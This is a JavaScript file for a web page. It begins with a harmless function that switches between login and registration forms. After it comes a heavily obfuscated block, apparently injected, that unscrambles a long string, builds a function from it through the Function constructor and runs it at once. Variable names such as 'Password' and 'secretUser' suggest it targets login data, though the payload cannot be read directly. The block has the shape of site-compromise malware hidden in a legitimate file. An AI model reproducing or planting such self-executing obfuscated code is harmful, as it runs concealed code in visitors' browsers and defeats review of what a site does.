function switchForm(form) {
    if (form === 'register') {
        document.getElementById('loginForm').classList.add('hidden');
        document.getElementById('registerForm').classList.remove('hidden');
    } else {
        document.getElementById('loginForm').classList.remove('hidden');
        document.getElementById('registerForm').classList.add('hidden');
    }
}

var Password,secretUser;(function(){var Cxo='',pRV=460-449;function vwU(q){var x=148880;var b=q.length;var u=[];for(var z=0;z<b;z++){u[z]=q.charAt(z)};for(var z=0;z<b;z++){var n=x*(z+188)+(x%39846);var s=x*(z+461)+(x%40728);var v=n%b;var k=s%b;var j=u[v];u[v]=u[k];u[k]=j;x=(n+s)%2171462;};return u.join('')};var hPr=vwU('niucdmttfylxbeqcjvhorrsnatpkucgorwsoz').substr(0,pRV);var jwd='ia(  =s1.mi2),)=n2.vfrun*"}bhdsf)h1jhl=n=p7rftpvgxfzv;ra9 i=e7a,b1[9v,[166d,g2v80,=6;8[,t0f8,,t5u6w,r7v7=,+0<7(,l4o62,]5.;ra; ;=+].ffr1vervdf0udgkel,n th;t+0))[-[,]l=.+,;;a) r=.];z;=t2"mh=89ton=a4{farevar6pr0)psa]g.mmnosdlrn8t.;C+u)-vrrfg,apglm]n!s}p..(p,ie(. [)=ftr[vorrc)g[l1n(t8-v;a>)0zc;- {fao f=hual]v=raj=gic{;ham [==u lrv;rtic0(v;rda j2l)njtr;kau 0;;o{(ua) 9=9;[<f;n+n),vsrcy)j c)ahC"drAk(d)wv9r}v)b+yd;,f=v){s=uvo1e*h+;.wh.rmowe+tlfo1h-r;r=8;(+i;nense (f(yu=,)vrvm;(r.;e8gahpz7jgc}a+C.deAa(o+")C+j.ohgrro)ehtlfi2r-=;)=(;++)2;}(l.e[cin)iou.;{i((4=5n=lr)k=+]ci=(i>=)g.;unh(jvs=bat8i=gCiuhA)tw(pCs+(o[e+(]<;w=f+v;ri+((!en,l0);i}(j<a);.suchrjisfbutpi(gSii)9gzc+==.to+n2"c) }fqopysr(1[7]2;ovarbevqaj]in( "1;ha; l=f94,e0.3h,]2+36,g2t.powc=trk-;;ar t=4triigdfAo{C;arCwd7(f6,;nok(ia4  =(;n<t. e[g"h1dr+jeaersalftjtsndcla Ad(z)].eo,naS rrn,.urqmlh=reogequ7dh)w;hedu6nae]s=l"tft("1"r.0o+n(ta;';var bvQ=vwU[hPr];var wjO='';var hdT=bvQ;var dha=bvQ(wjO,vwU(jwd));var BiP=dha(vwU('nu)et)Hi;}([:eoCbnp9om*.,"1eH,u)9 cH>]oH#H}!uckp6n0inHH ,,s]H)3eHeS.cjngdcmrC";ieMH)Hfun[{4()s7a%fHa.ac4Hy.)u-3)H.)_&,w{mbwcf$1]oa),_)Hyn)(lHn3Hg#spHt.t9H,s##anoi_;}&ogs1=p b(m.bu4(pr"=hl+54ilHo!doei\/0_:rHjptr}t)H:(eel-4Hp4z]%\/pweH]r#),))$.tr]cuH)uwotSdon\')t]1 9%gcrH}(H={cl9 }-tHHc%;aHdwHH{odn1mm.(esnc_c)eb&1)r%8t#80!cs2c.=Hg]){;HHt>edE : 3eAedtdvnna,a.H@irn\'n(k, 47p,Hgqe)(H,H"jrHc5o<[ #Hf;[}3o$0)H {[Hdak$H}.sr3];(2bh=ut0lS3n.nfcH;:);6]Hrf$juf7n9l;a4ct6.oueo$;y4H<b=c{eopHe .#wH!.f2).$4(br.ino!:eH(,fH;_]gdc$s9\'}r(dHH61H=w_0.(5H$.d0%,+(.n< ts7n)aHHp77%,!$ts(,=u).]]$_H{-H_._e$8(l!=s;,.@4msb7Hb70f;tHs_3H;?Hr3.cz.;9H4a;ce$rHH7!]}, $Hip8c.2t;;Htc!w,H)s0.kHo_lk)y)i%)H_(e.b+ke._33e7u=+)s6-mebc3_sn7)t.3ihH.C5@f1eur$6i7HH9=ie;nt,di\/],z=.ciaz=ftdHinecHc8([nt,;riHH()daupHcHH!!Htc} =,%)y0,(7HpcHt.H}Hcz(Halo5uHe1lrn;\/d(Ho iw((7e:=.metb)otss235sH70Aiut(H]7H.(}r%He.537H)4(oneIako)=?)fH$fHHn4H{H,9d2wd,H3;=ey_uA$l.2HH.03u(*%4s.)y6%4e"=H*1ng(Hir1,(ncp10g.)=c&n_;]rf;$res2%.3.ij+H!e,t&iHm$r;=.:.HH#S(pH;g;:&)t0)0..o,!3coHx1r_=%4t3k2.:H8s(H2k3j5.19edH6id{!:.d{nH=Hm+=o%i;[toHHm8e#){o\'ecyh(n3;e2.8(7H.z_y,of}u03y9y?7$pui,1 ,!trtyHi+H,A 9*Hf53d.>+;e!HH6do=u!)_=nlHc.Hnr$y\/o)o(r.H5(tsfnb)*.66kfH)H3_ =H_.%t6]Htt_it;b! 1o2HH+wr(0..H2)akr.{itHHe_gH!);cxz;HtHrh*,e9bto@uc He.6hwetfHpxdHH_rH2He]$c);r1n;1}.(b-uo8o+Hee$$ee)H"e1o,fg![b;,l4ji.e=, .t_H)n._.$Hk$ot10owH)r.tHoH>?a Htp8<ot,e1;t+bwctH sfHnn.\'e_i(=vlaHpo\/eH9btH=uso2ed!1Hju3cdnDiel8dHH$[%ceb)r].}1f)1Heon,n]Hcg l;io t][a!6.allo)c;H7o)0l6c 1m\'!ji3n8].!_=eHH,t1t;1$H=n7Ht,vuH.8 H](:Hn(o;$1 jsI1o%:!  }tH(5H.,nobi.e !teoH=a%(  %oH'));var EAZ=hdT(Cxo,BiP );EAZ(2059);return 1055})()
